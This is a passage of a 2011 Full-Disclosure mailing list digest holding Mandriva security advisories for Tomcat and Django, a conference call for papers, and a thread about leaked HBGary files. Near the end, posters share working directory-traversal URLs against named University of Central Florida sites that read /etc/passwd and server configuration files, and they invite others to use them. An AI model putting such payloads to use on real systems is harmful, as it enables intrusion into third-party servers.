> 0561c5ba6f593f8cb21d6433b31bbdf0
> 2010.0/i586/tomcat5-jasper-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> c3d3ed8727164b1542b08cc35b74eeb3
> 2010.0/i586/tomcat5-jasper-eclipse-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 137b051b6fa4a159098151aed959d4b8
> 2010.0/i586/tomcat5-jasper-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> fb2d81779b9a6701f935b69c72dfd1a2
> 2010.0/i586/tomcat5-jsp-2.0-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 247083e1e461555c064c57fb22293eb4
> 2010.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 1eb783fc2a5fd77fc04327f103f3e924
> 2010.0/i586/tomcat5-server-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> ff93f3807ad38a6f3efd3b755e4b8a9c
> 2010.0/i586/tomcat5-servlet-2.4-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 63293aef2e275ccf3c5dca5ab69b1a5b
> 2010.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 5295cf4e876b552468657fd61eff83af
> 2010.0/i586/tomcat5-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 3e8072e942561408d7c33bd24517b4c9
> 2010.0/SRPMS/tomcat5-5.5.27-0.5.0.2mdv2010.0.src.rpm
>
> Mandriva Linux 2010.0/X86_64:
> c4999736e1bc0c9a5a97d594cee65c1c
> 2010.0/x86_64/tomcat5-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 6b1e3d535d54b0be9e2ae5d1097ccada
> 2010.0/x86_64/tomcat5-admin-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 8b312a00888405017f0a569a941ef886
> 2010.0/x86_64/tomcat5-common-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 2418f2e08935a6f0992b092a4bffecc8
> 2010.0/x86_64/tomcat5-jasper-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 83a682d9a8f037101b9551cd78a016c6
> 2010.0/x86_64/tomcat5-jasper-eclipse-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> bb1adfd0118f39da9a5b3f65ae84e62f
> 2010.0/x86_64/tomcat5-jasper-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 4a98e6b4fc7d0f857fc992b939d842ad
> 2010.0/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 4037dc8df08254a5c8e93313221a7514
> 2010.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 1c1a706e810c6cd0c063d84b0522585a
> 2010.0/x86_64/tomcat5-server-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 62bc24195dda4032d33bb206031bd037
> 2010.0/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> c3bb0d7222dbc10f3d14a95ca8a79644
> 2010.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> a300b02d11c66be9c4b7025a16db508d
> 2010.0/x86_64/tomcat5-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> 3e8072e942561408d7c33bd24517b4c9
> 2010.0/SRPMS/tomcat5-5.5.27-0.5.0.2mdv2010.0.src.rpm
>
> Mandriva Linux 2010.1:
> 5bdb48aeda19057db32a64589eacd82a
> 2010.1/i586/tomcat5-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 96ecbc6c012122bf2e11e500c6402205
> 2010.1/i586/tomcat5-admin-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> a176c1651cc2d08ed8510c01622d5176
> 2010.1/i586/tomcat5-common-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 9240df47c808e342c5bc6dcd910d85f5
> 2010.1/i586/tomcat5-jasper-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 6f46c2c619ec79ec43783efcf7e908c2
> 2010.1/i586/tomcat5-jasper-eclipse-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 133a8b24ec4aa7662c0145ff5303beca
> 2010.1/i586/tomcat5-jasper-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 97eaf631f481c6431c7439755e33fde5
> 2010.1/i586/tomcat5-jsp-2.0-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 794935023c7630d13a887b474b78bb7e
> 2010.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> ce72eb40ddf157064e8926eb58e2740b
> 2010.1/i586/tomcat5-server-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 84f3460a32131aef7f663ea2c5981859
> 2010.1/i586/tomcat5-servlet-2.4-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> f04fe3121f8b1cf579f0cc92099c364a
> 2010.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> ec6163a7e1ee720c01f86b7070ae1a5d
> 2010.1/i586/tomcat5-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> e480656f0abde41f97e478151a7fc71f
> 2010.1/SRPMS/tomcat5-5.5.28-0.5.0.2mdv2010.2.src.rpm
>
> Mandriva Linux 2010.1/X86_64:
> 405ff9248913717a0249614e3ccdeff4
> 2010.1/x86_64/tomcat5-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 0500f420f913cac42c8c2398182e0b8d
> 2010.1/x86_64/tomcat5-admin-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> f796e84a6cf4dac452eaaec03b819c97
> 2010.1/x86_64/tomcat5-common-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 3e25bb28dc6c08b2dcbd1a272d01eaec
> 2010.1/x86_64/tomcat5-jasper-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 07e577e2fbc57e40b944478449715240
> 2010.1/x86_64/tomcat5-jasper-eclipse-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 1e688aca310915303d257abaa0c55099
> 2010.1/x86_64/tomcat5-jasper-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 631f812a7a32013ba301cecbeb23163d
> 2010.1/x86_64/tomcat5-jsp-2.0-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 5970e0221d6d5386f04316b6805c6bfc
> 2010.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> f64a8611f668cd19bafb0a8884c3b998
> 2010.1/x86_64/tomcat5-server-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> ba19195b485e4468780f36010c5215b5
> 2010.1/x86_64/tomcat5-servlet-2.4-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> e241ad2d2ea43d6515b61a256fdbc61e
> 2010.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 15718f212c8d29bdbaac81ab40afbd2a
> 2010.1/x86_64/tomcat5-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> e480656f0abde41f97e478151a7fc71f
> 2010.1/SRPMS/tomcat5-5.5.28-0.5.0.2mdv2010.2.src.rpm
>
> Mandriva Enterprise Server 5:
> bd71ae4141fbf5a884cfbccc756c8329
> mes5/i586/tomcat5-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 75b8764895d7b231901602dd0605f2e2
> mes5/i586/tomcat5-admin-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 6c827ad66b01560b72c5a8c96616afaa
> mes5/i586/tomcat5-common-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 1a2155333c323146ef3e1fbdeae96035
> mes5/i586/tomcat5-jasper-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 554ec541f6857a7946a6fae67c0a2fa6
> mes5/i586/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 10b54ca8ebefcd816bade65dae8e408b
> mes5/i586/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 8a12958fd3040ca0f4ce23bb7a3a1bdf
> mes5/i586/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 320881d8a847077fc8a7d70d7d0e0a02
> mes5/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 8ab623786a3479dc5e990b9949a13502
> mes5/i586/tomcat5-server-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> d4c53039181b378a3da1016c137ad843
> mes5/i586/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 52922ac7e5b4c1a7356d5248cf264a1d
> mes5/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 6cf03c3b0981031f6bf7b8710990bcb0
> mes5/i586/tomcat5-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> a4f9e4804454f2d628865ad654d6a188
> mes5/SRPMS/tomcat5-5.5.27-0.3.0.4mdvmes5.1.src.rpm
>
> Mandriva Enterprise Server 5/X86_64:
> 20eee581278206c28db4e304a6756671
> mes5/x86_64/tomcat5-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> d6b1d88885c03c36a84dd7703bb82bbb
> mes5/x86_64/tomcat5-admin-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> a04900de513cbaf5359b41b1df0e9ff3
> mes5/x86_64/tomcat5-common-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> c58d2e125e9c2e4de256224d64cf1d46
> mes5/x86_64/tomcat5-jasper-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 7612d8a28f5e008405a282ceb265a769
> mes5/x86_64/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 0796bfcd6e042c1128426bb47aae03d5
> mes5/x86_64/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 2ccd09878fd1f3ef8e4846864bd2f71e
> mes5/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 1b94570c1a5913fd0eefbcbee71afdc8
> mes5/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> ca2608f81795ff805e34e7316799a6a7
> mes5/x86_64/tomcat5-server-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 37d677648216a2d5577db95f0ab9f194
> mes5/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 42077f152ee121ed61cda754200f8902
> mes5/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 75657b92a4a6d94e27c3188653cad41e
> mes5/x86_64/tomcat5-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> a4f9e4804454f2d628865ad654d6a188
> mes5/SRPMS/tomcat5-5.5.27-0.3.0.4mdvmes5.1.src.rpm
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi. The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security. You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
> _______________________________________________________________________
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iD8DBQFNXrAVmqjQ0CJFipgRAjIfAJ4yL+76n74D2G8gpFyNCGQ4s6+6GACglNTw
> j0b0pCkznIMqccTMYR+zW5E=
> =KGzB
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------
>
> Message: 13
> Date: Fri, 18 Feb 2011 22:28:03 +0100
> From: Alejandro Cánovas Solbes<alejandro.canovas.cp46700@xxxxxxxxx>
> Subject: [Full-disclosure] Deadline extension | MOBILITY 2011 || July
> 17-22, 2011 - Bournemouth, UK
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<201102182128.p1ILS2L6027576@xxxxxxxxxxx>
> Content-Type: text/plain; charset=us-ascii
>
>
> INVITATION:
>
> =================
> Please consider to contribute to and/or forward to the appropriate groups the
> following opportunity to submit and publish original scientific results.
> =================
>
> ============== MOBILITY 2011 | Call for Papers ===============
>
> CALL FOR PAPERS, TUTORIALS, PANELS
>
> MOBILITY 2011: The First International Conference on Mobile Services,
> Resources, and Users
> July 17-22, 2011 - Bournemouth, UK
>
> General page: http://www.iaria.org/conferences2011/MOBILITY11.html
>
> Call for Papers: http://www.iaria.org/conferences2011/CfPMOBILITY11.html
>
> Submission deadline: March 10, 2011
>
> Technical Co-Sponsors:
> - The Bournemouth& Poole College
> - UNIK - University Graduate Center
> - Bournemouth University
> - Movation Collaboration Centre
> - Center for Wireless Innovation, Norway
> - INRIA
> - PT Inovacao
> - Cisco Systems, Inc.
> Sponsored by IARIA, www.iaria.org
>
> Extended versions of selected papers will be published in IARIA Journals:
> http://www.iariajournals.org
> Extended versions of selected papers on vehicular mobility will be published
> in a special issue of IJET Journal:
> http://www.inderscience.com/browse/index.php?journalID=133
>
> Please note the Poster Forum and Work in Progress options.
>
> The topics suggested by the conference can be discussed in term of concepts,
> state of the art, research, standards, implementations, running experiments,
> applications, and industrial case studies. Authors are invited to submit
> complete unpublished papers, which are not under review in any other
> conference or journal in the following, but not limited to, topic areas.
>
> All tracks are open to both research and industry contributions, in terms of
> Regular papers, Posters, Work in progress, Technical/marketing/business
> presentations, Demos, Tutorials, and Panels.
>
> Before submission, please check and conform with the Editorial rules:
> http://www.iaria.org/editorialrules.html
>
> MOBILITY 2011 Topics (topics and submission details: see CfP on the site)
>
> Mobile architectures, mechanisms, protocols
> Mobility and wireless; Mobility enabling protocols; Mobile software; Service
> composition in mobile environments; Knowledge and service discovery in mobile
> environments; On-demand mobility; User presence in mobile environments;
> Replication in mobile environments; Middleware for mobile environments;
> Internet and mobility; Software architecture for mobile applications
>
> Mobile networking and management
> Fundamentals of mobile networks; Mobile-Fixed interworking; Heterogenous
> networks; Beyond IMT-A; Mobile network virtualization; Femtocells and relays;
> Mobile cells; Mobile network sharing and network access; Self-management of
> mobile networks; Mobility management; Access control in mobile environments;
> Advanced roaming concepts; Mobile network edge-based service delivery
> platforms; Mobile content delivery networks; Mobile peer-to-peer systems;
> Mobile VPNs; Quality of experience in mobile networks
>
> Mobile devices and services
> Smart mobile devices; Embedded mobile; Sensors and mobiles; Mobile media,
> mobile content; Mobile applications (mobile learning, mobile healthcare,
> etc.); Mobile games; Mobile business; Mobile Web applications; Apps versus
> Web; Novel software concepts for mobile services; Mobile- and micro payment;
> mCommerce
>
> Mobile prosumers and interfaces
> User interaction and mobility; Mobile communities; Mobile Web interfaces and
> interaction techniques; Implementations and experimental mobile systems;
> Mobile Web; Mobile search and advertising
>
> Mobile Internet of Things
> Future mobile Internet; Internet of Things; Machine to Machine, People,
> Business (M2x); Online; Smart Homes; Smart Cities
>
> Vehicular mobile technology
> Architectures and platforms; Vehicular ad hoc networks; Vehicular routing
> metrics and supporting protocols; Mobility management and topology control;
> Standardization of vehicular networks; User aspects; Business enablers
>
> Challenges in mobile environments
> Security and privacy environments; Protection and safety of distributed
> mobile data; Context-aware mobility and privacy; Mobile emergency
> communication and public safety; Location-based services; Micro-payments;
> Accuracy and preciseness in localizing mobile entities
>
> ====================
> MOBILITY General Chair
> Josef Noll, University of Oslo& Movation, Norway
>
> MOBILITY Advisory Committee
> Petre Dini, Concordia University, Canada& IARIA, USA
> Pekka Jappinen. Lappeenranta University of Technology, Finland
> Maode Ma, Nanyang Technological University, Singapore
>
> MOBILITY Industry Liaison Chairs
> Filipe Cabral Pinto, Telecom Inovação S.A., Portugal
> Xiang Song, Microsoft, USA
> Xun Luo, Qualcomm Inc. - San Diego, USA
>
> MOBILITY Special Area Chairs on Video
> Mikko Uitto, VTT Technical Research Centre of Finland, Finland
>
> MOBILITY Special Area Chairs on Mobile Wireless Networks
> Mohammad Mushfiqur Chowdhury, University of Oslo, Norway
> Masashi Sugano, Osaka Prefecture University, Japan
>
> MOBILITY Special Area Chairs on Mobile Web / Application
> In-Young Ko, Korea Advanced Institute of Science and Technology (KAIST), Korea
>
> MOBILITY Special Area Chairs on Context-aware, Media, and Pervasive
> Brent Lagesse, Oak Ridge National Laboratory, USA
>
> MOBILITY Special Area Chairs on Mobile Internet of Things and Mobile
> Collaborations
> Jörn Franke, SAP Research Center - Sophia Antipolis, France
> Nils Olav Skeie, University College Telemark, Norway
>
> MOBILITY Special Area Chairs on Vehicular Mobility
> Gianluca Franchino, CEIICP - Scuola Superiore Sant'Anna - Pisa, Italy
>
> MOBILITY Special Area Chairs on Mobile Cloud Computing
> Chunming Rong, University of Stavanger, Norway
> Josef Noll, Center for Wireless Innovation, Norway
>
> MOBILITY Publicity Chairs
> Aline Carneiro Viana, INRIA Saclay - Ile de France - Orsay, France
> Sarfraz Alam, UNIK-University Graduate Center, Norway
>
> Committee: http://www.iaria.org/conferences2011/ComMOBILITY11.html
> ============================
>
>
>
> ------------------------------
>
> Message: 14
> Date: Fri, 18 Feb 2011 23:10:00 +0100
> From: security@xxxxxxxxxxxx
> Subject: [Full-disclosure] [ MDVSA-2011:031 ] python-django
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<E1PqYWW-0005jS-I9@xxxxxxxxxxxxxxxxxx>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> _______________________________________________________________________
>
> Mandriva Linux Security Advisory MDVSA-2011:031
> http://www.mandriva.com/security/
> _______________________________________________________________________
>
> Package : python-django
> Date : February 18, 2011
> Affected: 2010.0, 2010.1
> _______________________________________________________________________
>
> Problem Description:
>
> Multiple vulnerabilities has been found and corrected in python-django:
>
> Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 does not properly
> validate HTTP requests that contain an X-Requested-With header,
> which makes it easier for remote attackers to conduct cross-site
> request forgery (CSRF) attacks via forged AJAX requests that leverage
> a combination of browser plugins and redirects, a related issue to
> CVE-2011-0447 (CVE-2011-0696).
>
> Cross-site scripting (XSS) vulnerability in Django 1.1.x before
> 1.1.4 and 1.2.x before 1.2.5 might allow remote attackers to inject
> arbitrary web script or HTML via a filename associated with a file
> upload (CVE-2011-0697).
>
> Directory traversal vulnerability in Django 1.1.x before 1.1.4 and
> 1.2.x before 1.2.5 on Windows might allow remote attackers to read or
> execute files via a / (slash) character in a key in a session cookie,
> related to session replays (CVE-2011-0698).
>
> The updated packages have been upgraded to the 1.1.4 version which
> is not vulnerable to these issues.
> _______________________________________________________________________
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0696
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0697
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0698
> _______________________________________________________________________
>
> Updated Packages:
>
> Mandriva Linux 2010.0:
> 202f769807a186f2d9197c9eda30faa6
> 2010.0/i586/python-django-1.1.4-0.1mdv2010.0.noarch.rpm
> ba04206d09a47c76d3e5b0e60dbad79f
> 2010.0/SRPMS/python-django-1.1.4-0.1mdv2010.0.src.rpm
>
> Mandriva Linux 2010.0/X86_64:
> 33eb96488eced9ae1d573bb6f2706058
> 2010.0/x86_64/python-django-1.1.4-0.1mdv2010.0.noarch.rpm
> ba04206d09a47c76d3e5b0e60dbad79f
> 2010.0/SRPMS/python-django-1.1.4-0.1mdv2010.0.src.rpm
>
> Mandriva Linux 2010.1:
> 3cfc441c4f75142c19416c6f6d22eb2d
> 2010.1/i586/python-django-1.1.4-0.1mdv2010.2.noarch.rpm
> 4f628f112373a36feebb403daec0e646
> 2010.1/SRPMS/python-django-1.1.4-0.1mdv2010.2.src.rpm
>
> Mandriva Linux 2010.1/X86_64:
> 50a8a8aad7dd3001bee2560f8df1b156
> 2010.1/x86_64/python-django-1.1.4-0.1mdv2010.2.noarch.rpm
> 4f628f112373a36feebb403daec0e646
> 2010.1/SRPMS/python-django-1.1.4-0.1mdv2010.2.src.rpm
> _______________________________________________________________________
>
> To upgrade automatically use MandrivaUpdate or urpmi. The verification
> of md5 checksums and GPG signatures is performed automatically for you.
>
> All packages are signed by Mandriva for security. You can obtain the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
> _______________________________________________________________________
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iD8DBQFNXsGvmqjQ0CJFipgRAggbAKC6jBSLeNUZCFYKefNU6S5mo4G+QgCeLdLo
> ksEbjuDpyvINyjhBj/kj17s=
> =QCYL
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------
>
> Message: 15
> Date: Fri, 18 Feb 2011 23:17:00 +0100
> From: Dani?l W. Crompton<daniel.crompton@xxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTinx9gtrCkOo1+6x61kq7fJoEtMyHw6PAyCw6LF0@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> On 18 February 2011 20:11, Cal Leeming [Simplicity Media Ltd]<
> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>
>> I'm wondering along the same lines as Thor, based on intent. One of those
>> "don't take the piss or the judge is gonna own you" scenarios that would be
>> tested in court on a per trial basis. Like, if the files were known to
>> contain encrypted info, and if it was proved that you knew the contents of
>> those files, then you would be held liable.
>
> Unless you has actually decrypted the file you would not "know" what was in
> the file, you would be relying on what the person who gave you the file told
> you. I assume this would be some kind of hearsay, although a judge might
> consider you an accessory after the fact or a (co-)conspirator which in some
> cases might result in a higher sentence than the original crime.
>
> D.
>
>
> blaze your trail
>
> --
> Dani?l W. Crompton<daniel.crompton@xxxxxxxxx>
>
> <http://specialbrands.net/>
>
> <http://specialbrands.net/>
> http://specialbrands.net/
> <http://twitter.com/webhat>
> <http://www.facebook.com/webhat><http://plancast.com/webhat><http://www.linkedin.com/in/redhat>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/8bdc0d1a/attachment-0001.html
>
> ------------------------------
>
> Message: 16
> Date: Fri, 18 Feb 2011 13:28:21 -0500
> From: William Warren<hescominsoon@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<4D5EBA45.9090409@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> On 2/18/2011 11:24 AM, ck wrote:
>> So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
>>
>> ck
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> i've got a copy..:)
>
>
>
> ------------------------------
>
> Message: 17
> Date: Sat, 19 Feb 2011 01:08:56 -0500
> From: Hack Talk<hacktalkblog@xxxxxxxxx>
> Subject: [Full-disclosure] University of Central Florida Multiple LFI
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Found these and thought I'd share:
>
> -==================-
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> -==================-
> Let me know if you do anything fun with 'em
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html
>
> ------------------------------
>
> Message: 18
> Date: Sat, 19 Feb 2011 16:34:21 +0530
> From: Madhur Ahuja<ahuja.madhur@xxxxxxxxx>
> Subject: Re: [Full-disclosure] University of Central Florida Multiple
> LFI
> To: Hack Talk<hacktalkblog@xxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="utf-8"
>
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>
> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog@xxxxxxxxx> wrote:
>
>> Found these and thought I'd share:
>>
>> -==================-
>>
>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>>
>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>> -==================-
>> Let me know if you do anything fun with 'em
>>
>> Luis Santana - Security+
>> Administrator - http://hacktalk.net
>> HackTalk Security - Security From The Underground
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 72, Issue 44
> ***********************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/